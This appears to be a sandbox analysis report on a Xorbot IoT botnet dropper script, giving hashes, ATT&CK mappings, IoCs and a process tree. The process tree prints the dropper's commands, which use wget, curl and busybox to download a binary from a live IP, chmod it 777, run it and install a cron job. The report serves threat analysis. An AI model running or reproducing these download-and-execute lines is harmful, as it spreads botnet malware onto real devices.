xorbot | b516438a84f4d4febdc19c62bae733ac24bf557205fd8ac1e42d1fb0f83f0d5a

Analysis

max time kernel
149s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
11/12/2024, 15:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

5eab5295c0740b5344abb66f19ea0e39
SHA1

7796e56bc014459c40563c509569791a6f05341a
SHA256

b516438a84f4d4febdc19c62bae733ac24bf557205fd8ac1e42d1fb0f83f0d5a
SHA512

6922bb223cb1df386c64584feb519299b4e06ed94d6153a314e01a883ecfa5a608bfb4732e11dff85402cdc406fd1293db7914457c14f8024a54f87754afb4d4
SSDEEP

96:C//63ZCcEgN6L/vLIPnA43WlMf61Nx//63bZCcEgN8Lv7vLIPnlXXWTyYl6f81Na:dCcEg4BaWuf61PcEgVIQz

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral1/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (2147) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1500	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	1501	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74

Renames itself 1 IoCs

pid	Process
1502	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74

Unexpected DNS network traffic destination 14 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0
Destination IP	1.0.0.0

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.5CuHr6	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/414/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/442/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1077/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1539/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1567/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1726/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/14/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1763/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/419/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1558/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1572/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1773/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/651/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1765/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/19/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/24/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1309/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1727/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1748/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1754/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/7/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1086/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1183/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1555/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1711/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1747/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/870/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/197/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/406/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/28/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1686/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1672/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1597/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1140/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1509/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1535/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1590/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1643/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1661/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1774/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1029/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1776/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1570/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/83/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1228/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1551/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1755/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/20/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1283/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1669/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1789/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/23/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/424/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/664/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1059/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1520/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1561/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1639/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1687/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/30/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1648/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1658/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1635/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
File opened for reading	/proc/1143/cmdline	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1485	wget
1490	curl
1499	busybox
1501	pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
1508	rm

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	wget
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	curl
File opened for modification	/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:1483
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1484
- /usr/bin/wget
  wget http://216.126.231.164/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1485
- /usr/bin/curl
  curl -O http://216.126.231.164/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1490
- /bin/busybox
  /bin/busybox wget http://216.126.231.164/bins/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1499
- /bin/chmod
  chmod 777 pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - File and Directory Permissions Modification
  PID:1500
- /tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  ./pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:1501
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:1503
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:1504
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:1505
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:1506
- /bin/rm
  rm pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74
  2⤵
  - System Network Configuration Discovery
  PID:1508
- /usr/bin/wget
  wget http://216.126.231.164/bins/VohAOsXTP4ydnDgDbJeZUEcUuz62ylK00V
  2⤵
  PID:1511

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/pqxQ5KIpCx54287M1CRNi3A2oW4TZmrf74

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit
/var/spool/cron/crontabs/tmp.5CuHr6

Filesize
210B

MD5
4f42778f7729f934490d831a3cbb3700

SHA1
ea16c9eb8ae63a0b66e74c17785764568d92c8bd

SHA256
4143ed89519f5c1ec1dfb79954d88bd8669ca55eabd0465986e871765a260ba5

SHA512
6c13f992aa5aa19749cfe5e64941c6a6ee47f1dc5c5e4b839b95cee0e57b99c79844bfd9bb89fc38a903faa4cd4cd5df84d2c744dc63644960cca81e9bb07b7f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads